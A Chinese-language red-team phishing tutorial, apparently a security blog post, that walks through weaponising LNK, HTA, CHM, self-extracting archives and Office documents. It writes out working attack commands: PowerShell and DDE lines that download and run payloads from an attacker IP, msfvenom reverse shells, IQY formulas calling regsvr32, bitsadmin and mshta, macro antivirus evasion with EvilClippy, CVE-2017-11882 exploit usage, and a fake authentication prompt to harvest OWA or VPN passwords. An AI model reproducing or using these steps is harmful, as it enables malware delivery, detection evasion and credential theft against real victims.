<menu id="guoca"></menu>
<nav id="guoca"></nav><xmp id="guoca">
  • <xmp id="guoca">
  • <nav id="guoca"><code id="guoca"></code></nav>
  • <nav id="guoca"><code id="guoca"></code></nav>

    紅藍對抗釣魚篇之從入門到放棄

    VSole2022-07-10 06:15:00

    一、釣魚小技巧

    1.1 LNK 快捷方式

    lnk文件是用于指向其他文件的一種文件。這些文件通常稱為快捷方式文件,通常它以快捷方式放在硬盤上,以方便使用者快速的調用。lnk釣魚主要將圖標偽裝成正常圖標,但是目標會執行shell命令。

    cs演示:

    得到

    powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://192.168.2.158:80/a'))"
    

    然后新建快捷方式,將上述語句填入

    下一步,然后自己命名一下,點擊完成。

    當受害者雙擊之后就會自動執行我們的惡意payload,從目標網站下載并執行。

    最終被得到 shell。

    也可以使用msiexec.exe,系統進程,是Windows Installer的一部分,利用此進程來加載我們shellcode可以達到一定的規避作用。

    msfvenom-pwindows/meterpreter/reverse_tcplhost=vpsiplport=1234-fmsi>shell.txt
    c:\windows\system32\msiexec.exe/q/ihttp://xxx/shell.txt
    

    1.2 文件名反轉

    RLO,即Right-to-Left Override,我們可以在?件名中插?此類unicode字符,來達到?件名反轉的效果。

    cmd.exe來舉例,

    將其重命名為cmdgpj.exe,然后在 cmd 與 g 之間右鍵,看圖操作

    ok,此時已經變成了 以 jpg 結尾的了。但是雙擊運行還是 exe 格式運行的。

    再利用ResourceHacker修改圖標。

    找個小姐姐圖片轉換為 ico 格式。

    http://www.bitbug.net/
    

    如圖,雙擊實際上還是運行的cmd。

    1.3 HTA

    HTA是HTML Application的縮寫,直接將HTML保存成HTA的格式,是一個獨立的應用軟件,本身就是html應用程序,雙擊就能運行,卻比普通網頁權限大得多,它具有桌面程序的所有權限。

    制作:利用 cs

    attacks——>packages——>HTML application

    選擇powershell 生成。

    1.4 CHM

    CHM(Compiled Help Manual)即“已編譯的幫助文件”。它是微軟新一代的幫助文件格式,利用HTML作源文,把幫助內容以類似數據庫的形式編譯儲存。

    制作CHM需要用到一個工具 EasyCHM(http://www.etextwizard.com/)

    CHM制作過程:創建一個文件夾(名字隨意),在文件夾里面再創建兩個文件夾(名字隨意)和一個index.html文件,在兩個文件夾內部創建各創建一個index.html文件。

    將下列代碼放入index.html:

    Mousejack replay
    command exec
    </span></code><code style="white-space:pre-wrap;margin: 0px;padding: 0px;outline: 0px;max-width: 1000%;box-sizing: border-box !important;word-wrap: break-word !important;text-align: left;font-size: 14px;display: flex;font-family: Consolas, "Liberation Mono", Menlo, Courier, monospace;"><span class="code-snippet_outer" style="margin: 0px;padding: 0px;outline: 0px;max-width: 1000%;box-sizing: border-box !important;word-wrap: break-word !important;">x.Click();</span></code><code style="white-space:pre-wrap;margin: 0px;padding: 0px;outline: 0px;max-width: 1000%;box-sizing: border-box !important;word-wrap: break-word !important;text-align: left;font-size: 14px;display: flex;font-family: Consolas, "Liberation Mono", Menlo, Courier, monospace;"><span class="code-snippet_outer" style="margin: 0px;padding: 0px;outline: 0px;max-width: 1000%;box-sizing: border-box !important;word-wrap: break-word !important;">
    

    打開EasyCHM工具

    后點擊新建然后導入自己創建的文件夾,點擊確定后再點擊編譯,在彈出的對話框中點擊生成CHM按鈕,會你生成一個CHM文件。

    點擊之后就會彈出calc.exe

    當然我們也可以換成其他的,比如說 powershell payload。直接上線。

    1.5 自解壓

    直接上操作。

    flash安裝軟件+cs生成的后門來演示。

    選中需要壓縮的軟件,右鍵添加到壓縮軟件

    點擊創建自解壓格式壓縮文件

    點擊 高級-→ 自解壓選項

    填入解壓路徑, 絕對路勁,(C:\Windows\Temp 文件夾windows電腦都有)

    點擊設置--------提取后運行

    點擊模式,靜默模式, 全部隱藏

    點擊更新,設置

    更新方式----解壓并更新文件覆蓋方式----覆蓋所有文件
    

    確定,出去可以文件名改的像一點。

    最后點擊確定。生成自解壓文件,

    圖標有點不太對勁,使用 Restorator 把flash圖標摳下來,在弄到生成的自解壓文件。

    具體操作就不寫了,直接看結果。

    1.6 捆綁文件

    K8免殺系統自帶捆綁器加強版V2.0.EXE

    超級文件捆綁器

    生成,執行之后會執行cmd.exe一樣的效果,但此時后門軟件也被執行了。

    二、Office釣魚

    WIN7
    Office 2016
    MSF
    CS

    2.1 基礎知識

    宏是Office自帶的一種高級腳本特性,通過VBA代碼,可以在Office中去完成某項特定的任務,而不必再重復相同的動作,目的是讓用戶文檔中的一些任務自動化。現在Office的宏功能已經默認是禁用。

    Visual Basic for Applications(VBA)是Visual Basic的一種宏語言,是微軟開發出來在其桌面應用程序中執行通用的自動化(OLE)任務的編程語言。主要能用來擴展Windows的應用程序功能,特別是Microsoft Office軟件,也可說是一種應用程式視覺化的Basic 腳本。

    常用的套路使對方開啟宏,

    文檔是被保護狀態,需要啟用宏才能查看;
    添加一張模糊的圖片,提示需要啟用宏才能查看高清圖片;
    提示要查看文檔,按給出的一系列步驟操作;
    貼一張某殺毒軟件的Logo圖片,暗示文檔被安全軟件保護。

    推片來源 https://mp.weixin.qq.com/s/YKZ6yWWxOhn2KjTV5lDP7w

    2.2 Word宏釣魚

    CS生成宏

    打開Word文檔,點擊 “Word 選項 — 自定義功能區 — 開發者工具(勾選) — 確定” 。

    編寫主體內容后,點擊 “開發工具 — Visual Basic”,雙擊 “ThisDocument” ,將原有內容全部清空,然后將宏payload全部粘貼進去,保存并關閉該 VBA 編輯器 。

    另存為的Word類型務必要選”Word 97-2003 文檔 (*.doc)”,即 doc 文件,保證低版本可以打開。之后關閉,再打開即可執行宏代碼。

    默認情況下,Office已經禁用所有宏,但仍會在打開Word文檔的時候發出通知。

    點擊啟用內容,CS即上線

    MSF生成宏

    msfvenom -pwindows/meterpreter/reverse_tcp LHOST=192.168.2.148 LPORT=4444-fvba -ovba.txt
    

    上線不穩定。

    2.3 宏免殺

    Evil Clippy

    https://github.com/outflanknl/EvilClippy/releases
    

    windwos安裝:

    在Visual Studio開發者命令行窗口中輸入下列命令:

    csc/reference:OpenMcdf.dll,System.IO.Compression.FileSystem.dll/out:EvilClippy.exe*.cs
    

    運行成功,生成exe程序。

    Usage:eviloffice.exe[OPTIONS]+filenameAuthor:StanHegtEmail:stan@outflank.nlOptions:-n,--name=VALUEThetargetmodulenametostomp.Thisargumentcanberepeated.-s,--sourcefile=VALUEFilecontainingsubstitutionVBAcode(fakecode).-g,--guihideHidecodefromVBAeditorGUI.--gg,--guiunhideUnhidecodefromVBAeditorGUI.-t,--targetversion=VALUETargetMSOfficeversionthepcodewillrunon.-w,--webserver=VALUEStartwebserveronspecifiedporttoservemalicioustemplate.-d,--delmetadataRemovemetadatastream(mayincludeyournameetc.).-r,--randomnamesSetrandommodulenames,confusessomeanalysttools.--rr,--resetmodulenamesUndothesetrandommodulenamesbymakingtheASCIImodulenamesintheDIRstreammatchtheirUnicodecounterparts-u,--unviewableVBAMakeVBAProjectunviewable/locked.--uu,--viewableVBAMakeVBAProjectviewable/unlocked.-v         Increasedebugmessageverbosity.-h,--help Showthismessageandexit.
    

    沒做任何處理之前,VT查殺 39/61

    從GUI隱藏/取消隱藏宏VT查殺 37/60

    在VBA GUI編輯器中隱藏所有宏模塊(默認的“ ThisDocument”模塊除外)。這是通過從項目流[MS-OVBA 2.3.1]中刪除模塊行來實現的。

    EvilClippy.exe -g macrofile.doc
    

    撤消由hide選項(-g)完成的更改,以便我們可以在VBA IDE中調試宏。

    EvilClippy.exe -gg macrofile.doc
    

    Stomp VBA(濫用P代碼)VT 查殺 12/60 效果很好,過火絨

    將來自文本文件fakecode.vba的虛假VBA代碼放在所有模塊中,同時保持P代碼不變。這濫用了模塊流[MS-OVBA 2.3.4.3]的未記錄功能。請注意,VBA項目版本必須與主機程序匹配才能執行P代碼

    EvilClippy.exe -s 1.vba macrofile.doc
    

    參數說明:-s 參數是通過假的 vba 代碼插入到模塊中,用以混淆殺毒程序,這里我們需要寫一個正常 無毒正常的 vba 腳本

    注意:VBA重踏不適用于以Excel 97-2003工作簿(.xls)格式保存的文件

    Sub Hello()Dim XX=MsgBox("Hello VBS")
    

    效果比較好,并且可以成功上線,

    多參數混合使用:

    EvilClippy.exe-s1.vba-g-rhello.docVT查殺12/61
    

    其余更多請看這里https://github.com/outflanknl/EvilClippy

    其他免殺方法:

    http://www.h0r2yc.com/2019/08/01/office%E5%AE%8F%E6%94%BB%E5%87%BB%E5%8F%8A%E5%85%8D%E6%9D%80/

    https://skewwg.github.io/2020/12/05/diao-yu-yu-she-gong-xi-lie-zhi-office-hong/

    2.4 遠程模板注入宏代碼

    利用Word文檔加載附加模板時的缺陷所發起的惡意請求,而達到的攻擊目的,所以當目標用戶點開攻擊者發送的惡意Word文檔就可以通過向遠程服務器發送惡意請求的方式,然后加載模板執行惡意模板的宏。

    發送的文檔本身不帶惡意代碼,所以能過很多靜態檢測。只需要在遠程DOTM文檔中編寫宏病毒或者木馬即可。

    思路:

    編寫一個帶有宏代碼的DOTM文檔,上傳服務器
    編寫一個能夠遠程連接的DOCX文檔
    將該文檔壓縮找到并更改settings.xml.rels文件中的內容,將其中的target內容修改為服務器上DOTM文檔的URL
    將DOCX解壓后的內容再以存儲模式壓縮為ZIP
    修改后綴名為DOCX,打開后即可實現遠程注入宏文檔

    按照上述Word宏釣魚方法制作,保存時保存類型為 dotm , fish.dotm,

    開啟Web服務,放在其目錄下,

    http://192.168.2.148:8000/hello.doc
    

    制作 docx

    直接下載份簡歷

    將下載的簡歷文件后綴 docx 改為 zip,解壓.

    將 target 內容改為[http://192.168.2.148:8000/hello.doc](http://192.168.2.148:8000/hello.doc),之后

    全選目錄所有文件,郵件壓縮問 yanmie.zip。

    之后再把zip 后綴改為 docx即可。

    靶機打開,啟用宏,可上線。

    2.5 CVE-2017-11882

    適用于:

    MicrosoftOffice 2000MicrosoftOffice 2003MicrosoftOffice 2007 Service Pack 3MicrosoftOffice 2010 Service Pack 2MicrosoftOffice 2013 Service Pack 1MicrosoftOffice 2016MicrosoftOffice 365
    

    Microsoft Office Word 的一個執行任意代碼的方法,可以在不啟用宏的情況下執行任意程序。

    這個功能的本意是為了更方便地在 word 里同步更新其它應用的內容,比如說在一個 word 文檔里引用了另一個 excel 表格里的某項內容,通過連接域 (Field) 的方式可以實現在 excel 里更新內容后 word 中同步更新的效果,問題出在這個域的內容可以是一個公式 (或者說表達式),這個公式并不限制內容。

    GitHub:

    https://github.com/Ridter/CVE-2017-11882
    

    使用:

    python Command109b_CVE-2017-11882.py -c"cmd.exe /c calc.exe"-otest.doc
    

    生成 test.doc 文檔,靶機打開。成功彈出加算器

    msf 復現。

    項目

    https://github.com/0x09AL/CVE-2017-11882-metasploit
    exploit/windows/fileformat/office_ms17_11882
    

    有點不穩,老是上線不了

    配合 HTA上線

    exploit/windows/misc/hta_server
    http://192.168.2.148:8080/IbsbCdtZ.ht
    

    靶機打開test2.doc直接上線

    2.5 word 中插入外部對象(OLE)方式欺騙

    改變題注,更加逼真

    雙擊,選擇確定,即可上線。

    2.6 構造DDE釣魚文檔

    創建一個文檔 dde.docx ,之后雙擊打開 dde.docx,直接Ctrl + f9快捷鍵便可以快速幫助創建一個域,我們則只需要在花括號中添加如下指令(彈出一個計算器),實戰過程中可以遠程加載我們的木馬。

    DDEAUTOc:\\windows\\system32\\cmd.exe"\/k calc.exe"
    

    成功彈出計算器。

    這里用ps遠程下載馬。

    輸入

    DDEAUTO"C:\\windows\\system32\\WindowsPowerShell\\v1.0\\powershell.exe -NoP -sta -NonI -W Hidden IEX (New-Object System.Net.WebClient).DownloadString('http://192.168.2.148:8000/beacon.ps1'); # ""Microsoft Document Security Add-On"
    


    點擊是-→ 是-→確認 后即上線。

    2.7 IQY特性釣魚

    利用nishang下的Out-WebQuery.ps1, 腳本生成包含惡意 payload url 的 iqy 文件。


    可以將IYQ簡單的理解成內置在excel中的一種特殊‘web瀏覽器’(不能加載腳本),通過IQY【即web查詢】語句,可以直接將各類web上的列表數據輕松引入到當前的excel中,而正是因為這樣,從而給了我們利用excel制作釣魚郵件的機會,假如你要引入的web數據是入侵者事先準備好的一段payload iqy惡意代碼,那結果就不言而喻了。

    利用過程:

    新建一個excel文件,找到”數據”→”自網站”→”地址”,填寫要抓取數據的網站url,選中想抓取數據的表單

    點擊導入

    點擊確定,即可成功導入

    接下來利用IYQ打開計算機來看看效果

    在我們自己的服務器的網站目錄下放一個payload.html文件,內容是IYQ代碼

    =cmd|'/c calc.exe '!A0
    

    接下來就是按照之前的方法,來拉取我們自己服務器上的payload文件

    導入

    點擊是,即可彈出計算器

    將文件保存,放在靶機打開

    點擊啟用內容,繼續點擊是,即可彈出計算器。

    其他方式

    regsv***
    =cmd|'/c regsv*** /s /n /u /i:http://ip/D4zv0M.sct scrobj.dll '!A0
    bitsadmin
    =cmd|'/c bitsadmin /transfer e822 http://ip/iqy %APPDATA%\e822.exe&%APPDATA%\e822.exe&del %APPDATA%\e822.exe '!A0
    mshta
    =cmd|'/c mshta http://ip/iqy.hta '!A0
    

    接下來進行彈shell操作

    用到的工具:

    nishang:https://github.com/samratashok/nishang/releases
    

    先在kali準備好payload:

    exploit/multi/script/web_delivery
    

    用nishang中提供好的Out-WebQuery腳本來生成iqy文件

    iqy文件本身的內容很簡單,只有一個包含惡意payload的url:http://192.168.2.148/msf.html,關鍵也就在這個 html,我們需要把 html 的內容換成加載我們上面準備好的 meterpreter payload 的 iqy 語句 :regsv* /s /n /u /i:http://192.168.2.148:8080/ZTPzcY6J5.sctscrobj.dll


    然后利用nishang-master\Client\Out-WebQuery.ps1,生成文件

    powershell-execbypass-Command"& {Import-Module ".\Out-WebQuery.ps1";Out-WebQuery -URL http://192.168.2.148:8000/msf.html}"
    

    命令成功執行后,會生成一個iqy文件

    接下來,打開Web服務目錄,創建msf.html,內容為剛剛msf生成的paylaod

    =cmd|'/c regsv*** /s /n /u /i:http://192.168.2.148:8080/ZTPzcY6J5.sct scrobj.dll '!A0
    

    接下來就可以想辦法把之前生成的iqy文件發送給受害者。

    當受害者雙擊打開時,默認會用Excel打開,彈出警告,點擊啟用

    因為前面的iqy文件是用cmd執行的,所以會繼續詢問是否啟動另一個應用程序,CMD.EXE.

    點擊是,正常情況下監聽的msf會生成一個會話。

    借助IQY竊取目標用戶密碼

    powershell-execbypass-Command"& {Import-Module ".\Out-WebQuery.ps1";Out-WebQuery -URL http://192.168.2.1}"
    powershell-execbypasscd.\UtilityImport-Module.\Start-CaptureServer.ps1Start-CaptureServer-AuthTypeBasic-IPAddress192.168..2.1-LogFilePathC:\windows\temp\log.txt# 注意此處的認證要選擇基礎認證,監聽的 ip 和上面生成 iqy 文件中的 ip 一致,通常都是本機 i
    

    之后把上一步生成的 IQY文件發給靶機,打開

    此認證窗口會連續出現三次,相信三次里面總有一個能用的賬號密碼,因為目標可能也壓根搞不清楚這是什么東西,以為是系統的賬號密碼,就隨便輸,其實我們主要還是想利用這種方式釣到可用的 owa 或者 v*n 賬號密碼

    2.8 PPT 動作按鈕特性構造 PPSX釣魚

    新型PPT釣魚攻擊分析

    首先,創建一個普通的PPTX文件,隨便填入一些內容,如下圖:

    這里要選擇空白的那個,選擇以后,在頁面中拉出一個觸發位置,之后會彈出動作設置的界面,選擇鼠標懸停-→ 運行程序

    msiexec.exe,系統進程,是Windows Installer的一部分,利用此進程來加載我們shellcode可以達到一定的規避作用。

    2.9 超鏈接

    在PDF、Office文檔中內嵌一個跳轉鏈接是很早期的釣魚方式,通過文字信息的引導,讓受害者點開頁面,如果缺乏戒心,就可能會獲取到受害者的賬號、密碼、銀行卡、身份證等信息。

    三、郵件釣魚

    郵件服務器相關環境搭建,郵件信息收集請見

    https://www.freebuf.com/articles/web/260391.html

    涵蓋偽造(SRC假漏洞、簡歷、宏文檔、合作利誘、技術交流、釣魚網站、第三方平臺)、偽造發件人、office 宏釣魚、exe引誘。

    四、flash釣魚

    選擇域名:http://www.f1ash.cn/

    源碼:https://github.com/r00tSe7en/Fake-flash.cn

    自解壓或者捆綁 配合 xss .

    詳細步驟見 1.6 .

    五、網站釣魚

    制作釣魚網站,克隆網站

    cs,msf都有這個功能

    setoolkit

    軟件vba
    本作品采用《CC 協議》,轉載必須注明作者和本文鏈接
    近日,國內安全專家在近期捕獲的樣本中發現了一種新型的完全使用VBA宏編寫的文件加密勒索軟件家族BluFish。傳統勒索軟件的重要功能模塊多半為二進制可執行程序,而腳本僅作為加載器使用。不同于其他勒索軟件,該加密文件時不會改變文件名稱,亦不會修改文件結構,而僅對Microsoft Word文檔內容進行加密,其勒索信息將連同加密內容一起顯示在Word文檔內容中。
    勒索軟件AstraLocker 2.0使用的誘餌是一個Microsoft Word文檔,該文檔隱藏了一個帶有勒索軟件有效載荷的OLE對象,其中嵌入式可執行文件的文件名為“WordDocumentDOC.exe”。
    專家們發現了 Agent Tesla Trojan 的新變種,其中包括從流行的網絡瀏覽器,VPN軟件以及FTP和電子郵件客戶端竊取憑據的模塊。Agent Tesla 是一種間諜軟件,用于通過收集受感染系統的擊鍵,系統剪貼板,屏幕截圖和憑據來監視受害者。“目前,Agent Tesla 繼續用于攻擊的各個階段。它持久地管理和操縱受害者設備的能力對低級犯罪分子仍然具有吸引力。”讀取SentinelOne發布的分析報告。攻擊者正在不斷進化,尋找新的方式成功使用像 Agent Tesla 這樣的工具,同時躲避檢測。
    微軟已將所有Office應用程序與防病毒軟件集成,以防止出現宏惡意軟件攻擊。該公司正在使用反惡意軟件掃描接口(AMSI)來處理嵌入在文檔中的VBA宏。最近,我們報道了黑客如何使用微軟Excel文檔來執行CHAINSHOT惡意軟件攻擊。這些類型的攻擊越來越普遍,黑客可以輕松訪問受害者的計算機。
    背景描述: Agent Tesla為一款知名的商業竊密木馬,自從2014年Agent Tesla被發現以來一直非常活躍,多個變種層出不窮,主要由.Net 編寫,用于從失陷主機上竊取敏感信息,如剪貼板數據,鍵盤按鍵記錄,能夠從Web瀏覽器,電子郵件客戶端和FTP服務器訪問信息,屏幕截圖等。
    來自AhnLab安全應急響應中心的研究人員報告說,研究人員警告說,Amadey惡意軟件正被用來在被攻擊的系統上部署LockBit 3.0勒索軟件。據悉,Amadey Bot是一個數據竊取的惡意軟件,在2018年首次被發現,它還允許運營商安裝額外的有效載荷。該文件是通過網絡釣魚信息傳播的,但目前ASEC還沒有確定用作誘餌的電子郵件。一旦安裝,Amadey會注冊到任務調度器以獲得持久性。自2022年以來,通過Amadey安裝的Lockbits已經在韓國分布,該團隊已經發布了各種分析勒索軟件的文章。
    “這可能意味著惡意軟件將在以后的攻擊中使用,防御者應密切注意這一威脅以防止感染。”據Dedola稱,Transparent Tribe的最新惡意軟件突顯了威脅組織不斷擴展其工具集和操作。Kaspersky的研究人員還使用名為Peppy的另一種基于.NET和Python的RAT觀察了該小組。Dedola指出:“使該小組特別危險的是活動的數量。”Dedola說,但這些國家的受害者很可能與印度和阿富汗有聯系。
    為了應對勒索軟件等惡意程序,微軟今年早些時候宣布計劃改變 MS Office 辦公軟件處理宏的方式
    此外,惡意 VBA 宏已退出,容器文件已進入,Robin Banks 幫助犯罪分子搶劫銀行等
    幾十年來,VBG 宏代碼都是攻擊者的核心工具。但自從微軟開始默認阻止來自互聯網的 Office 文件的所有 VBA 宏,這一攻擊途徑受到了極大的壓制。
    VSole
    網絡安全專家
      亚洲 欧美 自拍 唯美 另类